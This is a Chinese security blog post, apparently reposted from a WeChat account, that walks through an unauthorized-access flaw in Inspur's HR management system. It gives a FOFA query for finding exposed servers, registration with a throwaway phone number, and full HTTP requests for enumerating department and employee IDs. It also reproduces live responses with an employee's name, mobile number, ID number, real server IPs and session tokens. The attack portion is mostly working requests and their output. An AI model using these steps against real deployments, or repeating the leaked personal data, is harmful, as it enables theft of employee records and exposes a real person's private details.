浪潮人力资源管理系统未授权访问

admin 2023年9月14日08:11:33评论47 views字数 17708阅读59分1秒阅读模式

FOFA语句

icon_hash="-859381597"

注册不可登录账号

1.1    使用虚拟解码平台注册手机号

浪潮人力资源管理系统未授权访问


解码平台注册手机号

浪潮人力资源管理系统未授权访问

浪潮人力资源管理系统未授权访问



进行登录

浪潮人力资源管理系统未授权访问

这咱都不用管,看请求包数据就完事了

浪潮人力资源管理系统未授权访问

请求包如下

GET /api/auth/get_auth?app_type=service&v=0.95644037015842341691896612104 HTTP/1.1Host: X.X.X.X:8080Accept: application/json, text/plain, */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.200Referer: http://58.218.190.35:8080/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6Cookie: __image_validate_index=2|1:0|10:1691896507|22:__image_validate_index|48:OWE5YjhlOTQtMzk4Ny0xMWVlLWFhYWItYzY2YmMyNWMxMzcy|d2722e9a2f6a151c385595d61b1d9e406c956ffaa3657ca7cbfffb17f6bc92cd; token="2|1:0|10:1691896544|5:token|56:NGJmZDg0NWM2YjRlOTJhZjBhYmM5NjVlYjUxMmZkYTFmYTJiZDVhYw==|d416f2c64c15b26d6d64045b28e034593764f37e0c8ebfccd4c581a090d8196f"Connection: close

响应包如下

HTTP/1.1 200 OKDate: Sun, 13 Aug 2023 03:16:54 GMTContent-Type: application/json; charset=UTF-8Content-Length: 2297Connection: closeAccess-Control-Allow-Origin: *X-Content-Type-Options: nosniffEtag: "b218f78b97257252d3a7c3c1830132919c6bcb05"Vary: Accept-EncodingX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=block
{"user": {"id": 2174060, "cell_phone": "16284502739", "mail_address": null, "name": null, "account": null, "password": null, "bounded_company_id": null, "bounded_employee_id": null, "wx_open_id": null, "wx_union_id": null, "wx_recruit_id": null, "wx_ssc_id": null, "wx_user_info": null, "app_user_info": null, "security_level": null, "service_portal_style": 0, "disable": null, "language": null, "privacy_agreement": null, "exist_password": 0}, "employee": null, "entry": null, "candidate": null, "company": {"id": 2677, "name": "u6c5fu82cfu6069u534eu836fu4e1au6570u5b57u5316u5e94u7528u7ba1u7406u5e73u53f0", "comp_number": "auto", "comp_domain": "58", "unique_comp_domain": null, "special_domain": "58.218.190.36:8080", "keep_on_record": null, "location": null, "status": 15, "version": "standard", "offline_user": null, "sso_default": null, "sms_signature": null, "login_filter": null, "security_enabled": null, "system_not_grant_self": null, "encryption_password": null, "logo": "hcm-default-logo", "background": "c8609d98-166d-11ee-a00e-c66bc25c1372", "terminal_background": null, "banner": null, "background_mobile": "hcm-default-background-mobile", "top_menu_img": null, "hide_special_title": false, "environment_description": null, "init_flag": 2, "is_debug": null, "self_service_grant_mode": null, "manager_grant_mode": null, "outer_info": null, "background_mobile_v3": "mobile_background_v3", "background_mobile_v3_android": "background_mobile_v3_android", "year_begin_day": "2023-01-01", "period_begin": "202301", "current_year": "2023-01-01", "theme_color": "#03A9F4", "special_title": "u6069u534eu836fu4e1aHCM-u6f14u793au73afu5883", "company_id": 2677, "depart_id": 16996298, "personal_domain": "58.218.190.35:8080"}, "public_account": null, "manager_departs": [], "origin_departs": [], "roles": {"user": []}, "in_white_list": null, "wx_user": null, "jobs": [], "is_sys_manager": null, "sso": null, "company_setting": null, "bind_info": null, "app_type": "service", "ws_client_key": "89c2af9226e2dab0f8d701728f235579d650dfe7", "language": "zh_cn", "outer_token": null, "permit_api_list": null, "privileged": null, "developer_mode": null, "collaborator": null, "developer_temp": null, "privacy_agreement": null, "token": "4bfd845c6b4e92af0abc965eb512fda1fa2bd5ac"}

请求包构造

爆破"depart_id": 16996298咱自己注册的是16996298,咱爆破一手其他id

浪潮人力资源管理系统未授权访问


浪潮人力资源管理系统未授权访问

请求包


##"depart_id": 16996298上述响应包中的数据
POST /api/hcm.model.get?model=OrgUnit HTTP/1.1Host: X.X.X.X:8080accept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.200Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6Cookie: token="2|1:0|10:1691893868|5:token|56:NWI2ZWY4NDY5NzIzNjc1MzRiOTRkOGVmOTViYzZmODYwNzAxZDQ1ZQ==|9969fea5619c6d72271a07e24cf7e706d3a5c818b60897814479af33bd6dccfb"; __image_validate_index=2|1:0|10:1691896344|22:__image_validate_index|48:MzliMTg4YTQtMzk4Ny0xMWVlLWFhYWItYzY2YmMyNWMxMzcy|d467690584005381d404bd44e0af8a3cf19b5a95af8c512df6ce5b0fb795cbe3Connection: closeContent-Length: 54


{"model":"OrgUnit","id_":"16996299","fields":null}

响应包


HTTP/1.1 200 OKDate: Sun, 13 Aug 2023 03:57:16 GMTContent-Type: application/json; charset=UTF-8Content-Length: 9518Connection: closeAccess-Control-Allow-Origin: *X-Content-Type-Options: nosniffVary: Accept-EncodingX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=block
{"srv_begin": 1691899036922, "result": {"id": 16996299, "company_id": 2677, "begin_date": "2023-05-31", "end_date": "2199-12-31", "number": "20000001", "name": "u9884u7f6eu90e8u95e8", "org_full_name": null, "tree_id": null, "parent_id": 17085109, "isleaf": false, "adapter_id": null, "adapter_parent_id": null, "count_emp": null, "enabled": true, "orderno": "003", "full_orderno": null, "org_type": 20, "search_string": "u9884u7f6eu90e8u95e8:yuzhibumen:yzbm", "outer_emp_count": null, "outer_part_count": null, "inner_part_count": null, "invest_class_id": null, "economic_type_id": null, "business_class_id": null, "business_id": null, "dept_type": null, "duty": null, "org_unit_id": null, "abbreviation": null, "approve_code": null, "create_issue": null, "terminal_issue": null, "change_reason": null, "full_name": null, "modify_time": "2023-05-23 14:47:00", "updater_id": null, "operate_time": "2023-06-03 12:27:32", "operator_id": 4078499, "is_legal_entity": null, "establishment_date": "2023-05-04", "credit_code": null, "registered_address": null, "registered_country_id": null, "postal_address": null, "post_code": null, "fax": null, "work_content": null, "main_post": null, "job_id": null, "position_description_index": null, "position_parent_id": null, "position_type_id": null, "position_sequence_id": null, "job_step_id": null, "job_grade_id": null, "charge_business": null, "position_level_id": null, "charge_position_id": null, "charge_person_id": null, "soft_delete": null, "subordinate_unit_id": 17085109, "plan_manager_org_id": null, "is_work_shift": null, "work_shift_years": null, "is_compulsory_vacation": null, "compulsory_vacation_days": null, "need_executive_qualification": null, "entry_exit_records": null, "contract_body_id": null, "extend_count": null, "source_id": 17183695, "description": null, "outer_info": null, "is_virtual": null, "is_latest": "1", "c_field1": null, "c_field2": null, "c_field3": null, "c_field4": null, "c_field5": null, "c_field6": null, "c_field7": null, "c_field8": null, "c_field9": null, "c_field10": null, "c_field11": null, "c_field12": null, "c_field13": null, "c_field14": null, "c_field15": null, "c_field16": null, "c_field17": null, "c_field18": null, "c_field19": null, "c_field20": null, "data_object_id1": null, "data_object_id2": null, "data_object_id3": null, "data_object_float1": null, "data_object_float2": null, "parent": {"id": 17085109, "company_id": 2677, "number": "20", "name": "u6d4bu8bd5u5355u4f4dold", "org_full_name": "u6d4bu8bd5-u6d4bu8bd5u6709u9650u516cu53f8", "tree_id": null, "full_number": null, "parent_id": 16996298, "isleaf": false, "adapter_id": null, "adapter_parent_id": null, "count_emp": null, "plan_count": null, "enabled": true, "orderno": "004", "full_orderno": null, "org_type": 10, "search_string": null, "outer_emp_count": null, "outer_part_count": null, "inner_part_count": null, "invest_class_id": null, "economic_type_id": null, "business_class_id": null, "business_id": null, "dept_type": null, "duty": null, "org_unit_id": null, "abbreviation": null, "approve_code": null, "full_name": null, "is_legal_entity": true, "establishment_date": "2023-05-09", "credit_code": null, "registered_address": "u5f90u5dde", "registered_country_id": 7556557, "postal_address": null, "post_code": null, "fax": null, "work_content": null, "main_post": null, "job_id": null, "position_description_index": null, "position_parent_id": null, "position_type_id": null, "position_sequence_id": null, "job_step_id": null, "job_grade_id": null, "subordinate_unit_id": null, "charge_business": null, "plan_manager_org_id": null, "position_level_id": null, "charge_position_id": null, "charge_person_id": null, "contract_body_id": null, "begin_date": "2023-05-09", "modify_time": null, "updater_id": null, "operate_time": "2023-06-09 11:06:44", "operator_id": 4078499, "soft_delete": null, "is_work_shift": null, "work_shift_years": null, "is_compulsory_vacation": null, "compulsory_vacation_days": null, "need_executive_qualification": null, "entry_exit_records": null, "extend_count": null, "description": null, "outer_info": null, "is_virtual": null, "c_field1": null, "c_field2": null, "c_field3": null, "c_field4": null, "c_field5": null, "c_field6": null, "c_field7": null, "c_field8": null, "c_field9": null, "c_field10": null, "c_field11": null, "c_field12": null, "c_field13": null, "c_field14": null, "c_field15": null, "c_field16": null, "c_field17": null, "c_field18": null, "c_field19": null, "c_field20": null, "data_object_id1": null, "data_object_id2": null, "data_object_id3": null, "data_object_float1": null, "data_object_float2": null, "is_leaf": 0, "emp_count": null, "level": 0}, "subordinate_unit": {"id": 17085109, "company_id": 2677, "number": "20", "name": "u6d4bu8bd5u5355u4f4dold", "org_full_name": "u6d4bu8bd5-u6d4bu8bd5u6709u9650u516cu53f8", "tree_id": null, "full_number": null, "parent_id": 16996298, "isleaf": false, "adapter_id": null, "adapter_parent_id": null, "count_emp": null, "plan_count": null, "enabled": true, "orderno": "004", "full_orderno": null, "org_type": 10, "search_string": null, "outer_emp_count": null, "outer_part_count": null, "inner_part_count": null, "invest_class_id": null, "economic_type_id": null, "business_class_id": null, "business_id": null, "dept_type": null, "duty": null, "org_unit_id": null, "abbreviation": null, "approve_code": null, "full_name": null, "is_legal_entity": true, "establishment_date": "2023-05-09", "credit_code": null, "registered_address": "u5f90u5dde", "registered_country_id": 7556557, "postal_address": null, "post_code": null, "fax": null, "work_content": null, "main_post": null, "job_id": null, "position_description_index": null, "position_parent_id": null, "position_type_id": null, "position_sequence_id": null, "job_step_id": null, "job_grade_id": null, "subordinate_unit_id": null, "charge_business": null, "plan_manager_org_id": null, "position_level_id": null, "charge_position_id": null, "charge_person_id": null, "contract_body_id": null, "begin_date": "2023-05-09", "modify_time": null, "updater_id": null, "operate_time": "2023-06-09 11:06:44", "operator_id": 4078499, "soft_delete": null, "is_work_shift": null, "work_shift_years": null, "is_compulsory_vacation": null, "compulsory_vacation_days": null, "need_executive_qualification": null, "entry_exit_records": null, "extend_count": null, "description": null, "outer_info": null, "is_virtual": null, "c_field1": null, "c_field2": null, "c_field3": null, "c_field4": null, "c_field5": null, "c_field6": null, "c_field7": null, "c_field8": null, "c_field9": null, "c_field10": null, "c_field11": null, "c_field12": null, "c_field13": null, "c_field14": null, "c_field15": null, "c_field16": null, "c_field17": null, "c_field18": null, "c_field19": null, "c_field20": null, "data_object_id1": null, "data_object_id2": null, "data_object_id3": null, "data_object_float1": null, "data_object_float2": null, "is_leaf": 0, "emp_count": null, "level": 0}, "operator": {"id": 4078499, "operate_time": "2023-06-15 17:40:05", "operator_id": 4078499, "company_id": 2677, "name": "u5f20u78cau78ca", "number": "zll01", "photo": null, "life_photo": null, "sign_photo": null, "photo_state": null, "birthday": null, "lunar_calendar_birthday": null, "gender": "u7537", "adapter_id": null, "enabled": true, "native_place": null, "nation": "u6c49u65cf", "orderno": null, "id_type": "u62a4u7167", "specialty_hcm": null, "record_id": null, "take_work_time": null, "working_years_adjust": null, "company_age_adjust": null, "entry_date": "1900-01-02", "quit_date": null, "security_level": null, "is_demo": false, "administrator_type": null, "position_type": null, "identity_type": null, "constellation": null, "modify_time": null, "updater_id": null, "outer_info": null, "soft_delete": null, "soft_delete_date": null, "info_integrity": null, "enter_type": null, "description": null, "c_field1": null, "c_field2": null, "c_field3": null, "c_field4": null, "c_field5": null, "c_field6": null, "c_field7": null, "c_field8": null, "c_field9": null, "c_field10": null, "c_field11": null, "c_field12": null, "c_field13": null, "c_field14": null, "c_field15": null, "c_field16": null, "c_field17": null, "c_field18": null, "c_field19": null, "c_field20": null, "c_field21": null, "c_field22": null, "c_field23": null, "c_field24": null, "c_field25": null, "c_field26": null, "c_field27": null, "c_field28": null, "c_field29": null, "c_field30": null, "c_field31": null, "c_field32": null, "c_field33": null, "c_field34": null, "c_field35": null, "age_count": null, "birth_calendar": null, "working_years_count": null, "working_years": null, "entry_working_years": 123, "service_length": null, "service_length_count": null, "u_telepkone": null, "u_home_place": null, "u_idcard_end": "2023-06-16", "u_insure_end": null, "u_insure_city": null, "u_is_veterans": null, "u_company_mail": null, "u_working_area": null, "u_twice_company": "0", "u_first_join_date": null, "u_illegal_records": "0", "u_enhua_working_years": null, "u_identity_card_place": null, "u_change_working_years": null, "u_pre_resignation_area": null, "u_recruitment_channels": null, "u_social_working_years": null, "u_company_working_years": null, "u_post_before_resignation": null, "u_department_before_resignatio": null, "u_emergency_contact_person_rel": null, "u_friends_classmates_relatives": "1", "work_photo": null}, "data_instance_id": 17303218}, "srv_end": 1691899036929, "srv_all": 1691899036930}

继续构造请求包

浪潮人力资源管理系统未授权访问

请求包

###上述响应包中的数据"operator_id": 4078499
POST /api/hcm.model.get?model=Employee HTTP/1.1Host: X.X.X.X:8080accept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.200Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6Cookie: token="2|1:0|10:1691893868|5:token|56:NWI2ZWY4NDY5NzIzNjc1MzRiOTRkOGVmOTViYzZmODYwNzAxZDQ1ZQ==|9969fea5619c6d72271a07e24cf7e706d3a5c818b60897814479af33bd6dccfb"Connection: closeContent-Length: 49
{"model":"Employee","id_": 4078499,"fields":null}

响应包

HTTP/1.1 200 OKDate: Sun, 13 Aug 2023 03:36:57 GMTContent-Type: application/json; charset=UTF-8Content-Length: 3624Connection: closeAccess-Control-Allow-Origin: *X-Content-Type-Options: nosniffVary: Accept-EncodingX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=block
{"srv_begin": 1691897817236, "result": {"id": 4078499, "operate_time": "2023-06-15 17:40:05", "operator_id": 4078499, "company_id": 2677, "name": "u5f20u78cau78ca", "number": "zll01", "photo": null, "life_photo": null, "sign_photo": null, "photo_state": null, "birthday": null, "lunar_calendar_birthday": null, "gender": "u7537", "blood_type": null, "adapter_id": null, "enabled": true, "native_place": null, "married": null, "nation": "u6c49u65cf", "nationality": null, "political_status_id": null, "residence_place": null, "residence_type_id": null, "orderno": null, "birth_place": null, "id_type": "u62a4u7167", "identity_card": "893218914", "identity_card_index": null, "health": null, "specialty_hcm": null, "entry_source": null, "record_id": null, "dismission_reason": null, "dismission_type": null, "job_grade_id": null, "job_id": null, "job_level_id": null, "job_level_adjust_date": null, "group_time": "1900-01-02", "take_work_time": null, "working_years_adjust": null, "company_age_adjust": null, "entry_date": "1900-01-02", "early_retirement_date": null, "retirement_date": null, "correction_date": "2023-06-22", "quit_date": null, "employee_category_id": null, "position_status_id": null, "mobile": "18260622253", "mail": null, "security_level": null, "search_string": "2677Su5f20u78cau78ca:zhangleilei:zll:18260622253:zll01", "is_demo": false, "administrator_type": null, "position_type": null, "job_level": null, "identity_type": null, "identity_id": null, "archives_organization": null, "archives_status_id": null, "archives_number": null, "statistics_category_id": null, "constellation": null, "present_address": null, "emergency_contact_person": null, "emergency_contact_person_phone": null, "emergency_contact_person_two": null, "emergency_contact_person_two_phone": null, "modify_time": null, "updater_id": null, "outer_info": null, "soft_delete": null, "soft_delete_date": null, "info_integrity": null, "economic_work_years": null, "finance_job_years": null, "bank_job_years": null, "has_relatives": null, "enter_type": null, "description": null, "c_field1": null, "c_field2": null, "c_field3": null, "c_field4": null, "c_field5": null, "c_field6": null, "c_field7": null, "c_field8": null, "c_field9": null, "c_field10": null, "c_field11": null, "c_field12": null, "c_field13": null, "c_field14": null, "c_field15": null, "c_field16": null, "c_field17": null, "c_field18": null, "c_field19": null, "c_field20": null, "c_field21": null, "c_field22": null, "c_field23": null, "c_field24": null, "c_field25": null, "c_field26": null, "c_field27": null, "c_field28": null, "c_field29": null, "c_field30": null, "c_field31": null, "c_field32": null, "c_field33": null, "c_field34": null, "c_field35": null, "age_count": null, "birth_calendar": null, "working_years_count": null, "working_years": null, "entry_working_years": 123, "service_length": 123, "service_length_count": 123, "u_telepkone": null, "u_home_place": null, "u_idcard_end": "2023-06-16", "u_insure_end": null, "u_insure_city": null, "u_is_veterans": null, "u_company_mail": null, "u_working_area": null, "u_twice_company": "0", "u_first_join_date": null, "u_illegal_records": "0", "u_enhua_working_years": null, "u_identity_card_place": null, "u_change_working_years": null, "u_pre_resignation_area": null, "u_recruitment_channels": null, "u_social_working_years": null, "u_company_working_years": null, "u_post_before_resignation": null, "u_department_before_resignatio": null, "u_emergency_contact_person_rel": null, "u_friends_classmates_relatives": "1", "work_photo": null}, "srv_end": 1691897817239, "srv_all": 1691897817241}

漏洞挖掘需要注意三点:细心,细心,还是TMD细心!!!

浪潮人力资源管理系统未授权访问


本文版权归作者和微信公众号平台共有,重在学习交流,不以任何盈利为目的,欢迎转载。


由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。公众号内容中部分攻防技巧等只允许在目标授权的情况下进行使用,大部分文章来自各大安全社区,个人博客,如有侵权请立即联系公众号进行删除。若不同意以上警告信息请立即退出浏览!!!


敲敲小黑板:《刑法》第二百八十五条 【非法侵入计算机信息系统罪;非法获取计算机信息系统数据、非法控制计算机信息系统罪】违反国家规定,侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的,处三年以下有期徒刑或者拘役。违反国家规定,侵入前款规定以外的计算机信息系统或者采用其他技术手段,获取该计算机信息系统中存储、处理或者传输的数据,或者对该计算机信息系统实施非法控制,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。



原文始发于微信公众号(巢安实验室):浪潮人力资源管理系统未授权访问

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年9月14日08:11:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   浪潮人力资源管理系统未授权访问https://cn-sec.com/archives/2035563.html

发表评论

匿名网友 填写信息